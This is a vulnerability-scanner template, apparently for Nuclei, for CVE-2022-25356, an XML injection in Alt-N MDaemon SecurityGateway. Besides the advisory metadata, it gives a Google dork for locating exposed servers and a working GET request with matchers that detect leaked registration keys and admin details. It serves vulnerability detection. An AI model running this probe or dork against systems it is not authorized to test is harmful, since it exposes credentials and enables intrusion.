id: CVE-2022-25356

info:
  name: Alt-N MDaemon Security Gateway - XML Injection
  author: Akincibor
  severity: medium
  description: |
    In Alt-n Security Gateway product, a malicious actor could inject an arbitrary XML argument by adding a new parameter in the HTTP request URL. In this way the XML parser fails the validation process disclosing information such as kind of protection used (2FA), admin email and product registration keys.
  reference:
    - https://www.swascan.com/security-advisory-alt-n-security-gateway/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-25356
    - https://www.altn.com/Products/SecurityGateway-Email-Firewall/
    - https://www.swascan.com/security-blog/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-25356
    cwe-id: CWE-91
  metadata:
    google-dork: inurl:"/SecurityGateway.dll"
    verified: "true"
  tags: cve,cve2022,altn,gateway,xml,injection

requests:
  - method: GET
    path:
      - '{{BaseURL}}/SecurityGateway.dll?view=login&redirect=true&9OW4L7RSDY=1'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Exception: Error while [Loading XML"
          - "<RegKey>"
          - "<IsAdmin>"
        condition: and

      - type: status
        status:
          - 200